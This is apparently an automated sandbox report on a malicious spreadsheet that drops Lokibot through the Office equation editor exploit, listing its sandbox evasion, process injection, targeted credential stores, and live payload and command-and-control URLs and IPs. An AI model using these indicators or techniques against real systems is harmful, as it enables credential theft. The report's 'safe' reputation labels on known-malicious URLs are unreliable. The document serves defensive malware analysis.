              Source: Shipping-Documents.xlsxStream path 'EncryptedPackage' entropy: 7.99980515236 (max. 8.0)

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM3Show sources
              Source: Yara matchFile source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2856, type: MEMORY
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2684Thread sleep time: -300000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2940Thread sleep time: -104691s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2844Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2992Thread sleep time: -60000s >= -30000s
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 104691
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: VMWARE
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
              Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,
              Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
              Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00406069 GetUserNameW,
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2856, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3052, type: MEMORY
              Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Users\Public\vbc.exeCode function: PopPassword
              Source: C:\Users\Public\vbc.exeCode function: SmtpPassword
              Source: Yara matchFile source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3052, type: MEMORY
              Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsExploitation for Client Execution12Path InterceptionExtra Window Memory Injection1Disable or Modify Tools1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer15Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information11Credentials in Registry2File and Directory Discovery2Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Process Injection111Obfuscated Files or Information31Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing2NTDSSecurity Software Discovery221Distributed Component Object ModelEmail Collection1Scheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsVirtualization/Sandbox Evasion31SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading111Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion31DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection111/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 435330 Sample: Shipping-Documents.xlsx Startdate: 16/06/2021 Architecture: WINDOWS Score: 100 31 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->31 33 Found malware configuration 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 14 other signatures 2->37 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 38 34 2->12         started        process3 dnsIp4 29 103.89.90.94, 49167, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 7->29 21 C:\Users\user\AppData\Local\...\regasm[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 47 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->47 14 vbc.exe 7->14         started        25 C:\Users\user\...\~$Shipping-Documents.xlsx, data 12->25 dropped file5 signatures6 process7 signatures8 49 Multi AV Scanner detection for dropped file 14->49 51 Tries to steal Mail credentials (via file registry) 14->51 53 Injects a PE file into a foreign processes 14->53 17 vbc.exe 54 14->17         started        process9 dnsIp10 27 63.141.228.141, 49168, 49169, 49170 NOCIXUS United States 17->27 39 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->39 41 Tries to steal Mail credentials (via file access) 17->41 43 Tries to harvest and steal ftp login credentials 17->43 45 Tries to harvest and steal browser information (history, passwords, etc) 17->45 signatures11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Shipping-Documents.xlsx41%VirustotalBrowse
              Shipping-Documents.xlsx31%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe11%ReversingLabsByteCode-MSIL.Backdoor.Androm
              C:\Users\Public\vbc.exe11%ReversingLabsByteCode-MSIL.Backdoor.Androm

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              4.2.vbc.exe.355d638.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://103.89.90.94/pzldoc/regasm.exe0%Avira URL Cloudsafe
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://63.141.228.141/32.php/S4wFP8QBww9Tp0%Avira URL Cloudsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://103.89.90.94/pzldoc/regasm.exetrue
              • Avira URL Cloud: safe
              		unknown
              http://kbfvzoboss.bid/alien/fre.phptrue
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://alphastand.top/alien/fre.phptrue
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://63.141.228.141/32.php/S4wFP8QBww9Tptrue
              • Avira URL Cloud: safe
              		unknown
              http://alphastand.win/alien/fre.phptrue
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://alphastand.trade/alien/fre.phptrue
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000005.00000002.2182608909.0000000002900000.00000002.00000001.sdmpfalse
                		high
                http://www.day.com/dam/1.0A6AB76E0.emf.0.drfalse
                  		high
                  http://www.ibsensoftware.com/vbc.exe, vbc.exe, 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.%s.comPAvbc.exe, 00000005.00000002.2182608909.0000000002900000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		low
                  https://github.com/georgw777/MediaManagervbc.exefalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2170728064.0000000002361000.00000004.00000001.sdmpfalse
                      		high
                      https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssvbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpfalse
                        		high
                        https://github.com/georgw777/vbc.exefalse
                          		high
                          https://github.com/georgw777/MediaManager;https://github.com/georgw777/vbc.exe, 00000004.00000000.2161017267.0000000000D02000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2168355610.0000000000D02000.00000020.00020000.sdmp, vbc.exe.2.drfalse
                            		high

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            103.89.90.94
                            		unknownViet Nam
                            		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                            63.141.228.141
                            		unknownUnited States
                            		33387NOCIXUStrue

                            General Information

                            Joe Sandbox Version:32.0.0 Black Diamond
                            Analysis ID:435330
                            Start date:16.06.2021
                            Start time:12:28:10
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 48s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:Shipping-Documents.xlsx
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:6
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.expl.evad.winXLSX@6/20@0/2
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 30% (good quality ratio 28.7%)
                            • Quality average: 76.7%
                            • Quality standard deviation: 29%
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .xlsx
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • TCP Packets have been reduced to 100
                            • Report size getting too big, too many NtCreateFile calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            12:29:11API Interceptor93x Sleep call for process: EQNEDT32.EXE modified
                            12:29:15API Interceptor72x Sleep call for process: vbc.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            63.141.228.141Detalles del pago.pdf___________________________________________________.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/hGVMLp0uMVSWM
                            RFQ No3756368.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/nuldTOn9SBn3G
                            Proforma Invoice.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/cViU8nooOLcrF
                            DHL Receipt_AWB#600595460.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/tv9F9tOWmL3Dq
                            TDF9XB01IbjiGuv.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/qB0GQ2GKLyuOU
                            quote.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/GsoXa3yQ3p8IH
                            Zahtjev za ponudu 15#U00b706#U00b72021#U00b7pdf.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/S7zr5v1fXI3Rb
                            #U00c1raj#U00e1nlat k#U00e9r#U00e9se 15#U00b706#U00b72021#U00b7pdf.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/S7zr5v1fXI3Rb
                            Cerere de oferta 15#U00b706#U00b72021#U00b7pdf.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/S7zr5v1fXI3Rb
                            jO8Tn2nYdJ.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/3LJAZguIGMmJV
                            socdkv9RSS.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/3bi7icv31dccw
                            Estatment.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/5l0ZnNa7AB6Dl
                            Proforma_Valid_Prices_Order no.0193884_doc.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/3LJAZguIGMmJV
                            SecuriteInfo.com.Variant.MSILHeracles.18248.31707.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/NtbXO1knHRe3C
                            TNT Shipment Documents.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/tv9F9tOWmL3Dq
                            QUOTE 1B001.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/cUubrzlDZTTbS
                            DOC.022000109530000.pdf.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/fw2pM7fnRpMCI
                            detalles de la transferencia.pdf.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/fw2pM7fnRpMCI
                            XpQz54zQrMpkJxs.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/NtbXO1knHRe3C
                            DxMkM6DOH7.exeGet hashmaliciousBrowse
                            • 63.141.228.141/32.php/kMB4F28c3jZI6

                            Domains

                            No context

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            NOCIXUSDetalles del pago.pdf___________________________________________________.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            RFQ No3756368.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            Proforma Invoice.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            DHL Receipt_AWB#600595460.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            TDF9XB01IbjiGuv.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            invoice_sh.htmlGet hashmaliciousBrowse
                            • 63.141.243.99
                            quote.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            Zahtjev za ponudu 15#U00b706#U00b72021#U00b7pdf.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            #U00c1raj#U00e1nlat k#U00e9r#U00e9se 15#U00b706#U00b72021#U00b7pdf.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            Cerere de oferta 15#U00b706#U00b72021#U00b7pdf.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            jO8Tn2nYdJ.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            socdkv9RSS.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            Estatment.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            Proforma_Valid_Prices_Order no.0193884_doc.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            SecuriteInfo.com.Variant.MSILHeracles.18248.31707.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            TNT Shipment Documents.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            QUOTE 1B001.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            DOC.022000109530000.pdf.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            detalles de la transferencia.pdf.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            XpQz54zQrMpkJxs.exeGet hashmaliciousBrowse
                            • 63.141.228.141
                            VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNSeafood Order and Company Profile.xlsxGet hashmaliciousBrowse
                            • 103.133.109.192
                            RFQ.exeGet hashmaliciousBrowse
                            • 103.140.250.132
                            NEW ORDER.xlsxGet hashmaliciousBrowse
                            • 103.140.251.225
                            Purchase Contract.jarGet hashmaliciousBrowse
                            • 103.133.104.124
                            Booking.pdf.exeGet hashmaliciousBrowse
                            • 103.140.250.132
                            DHL_June 2021 at 11M_9BZ7290_PDF.exeGet hashmaliciousBrowse
                            • 103.133.109.176
                            Spec Design.exeGet hashmaliciousBrowse
                            • 180.214.238.96
                            YEj2a2f6ai.exeGet hashmaliciousBrowse
                            • 103.114.104.219
                            Purchase Contract.jarGet hashmaliciousBrowse
                            • 103.133.104.124
                            M113461.exeGet hashmaliciousBrowse
                            • 103.89.91.38
                            Draft HUD.jarGet hashmaliciousBrowse
                            • 103.133.104.124
                            MV SHUHA QUEEN.docxGet hashmaliciousBrowse
                            • 103.133.106.72
                            MV SHUHA QUEEN.docxGet hashmaliciousBrowse
                            • 103.133.106.72
                            8KfPvyojv5.exeGet hashmaliciousBrowse
                            • 103.149.13.196
                            vpUOv3498p.exeGet hashmaliciousBrowse
                            • 103.133.109.176
                            9n7miZydYC.exeGet hashmaliciousBrowse
                            • 103.133.106.117
                            NEW ORDER Ref PO-298721.docGet hashmaliciousBrowse
                            • 103.133.106.117
                            2-2.exeGet hashmaliciousBrowse
                            • 103.114.107.28
                            3-1.exeGet hashmaliciousBrowse
                            • 103.114.107.28
                            2-3.exeGet hashmaliciousBrowse
                            • 103.114.107.28

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe
                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:downloaded
                            Size (bytes):761856
                            Entropy (8bit):7.601403838460658
                            Encrypted:false
                            SSDEEP:12288:88zqLMOeSMxvquwaHpCwQqc6n2R8Uncvc6t8TSx+f5SSruwsr4Z4:zOgfquPHpCwQqRTTt88KSKNsrJ
                            MD5:7146B0D2CAED6422C289A08F63A5C685
                            SHA1:2666D058EA4E4A2CA5BC6E5EA75594E68FC63F1B
                            SHA-256:25AA6393CACFF94544387CC515F754DFD2AF133612A74FD84B64C6E17354D1ED
                            SHA-512:F0B3098F20A22095397AB88348ECFE0911B126739005C9B70A815543BE04465603D3ED0C070BA50488C88FE13B9470D003C114254941593BA20F4511CB01CC47
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 11%
                            Reputation:low
                            IE Cache URL:http://103.89.90.94/pzldoc/regasm.exe
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.`................................ ........@.. ....................................@.....................................K.......,...........................?................................................ ............... ..H............text....... ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........&..h...........P,.............................................j+.&.(....(....(.....o....*..0..........+.&.+.&. .....9S...&..(....8....& ....8;.....(.... ....8*.....(.... ....8......(....8.... ............E................................/... ....(....:....&..(.....(....9s...& .....9....&*.V+.&..(....(....(....*..V+.&..(....o#...(....*...+.&..*..+.&..*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*..+.&..(....*:+.&.....o!...*.J+.&....
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1AE5E43D.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):50311
                            Entropy (8bit):7.960958863022709
                            Encrypted:false
                            SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                            MD5:4141C7515CE64FED13BE6D2BA33299AA
                            SHA1:B290F533537A734B7030CE1269AC8C5398754194
                            SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                            SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                            Malicious:false
                            Reputation:moderate, very likely benign file
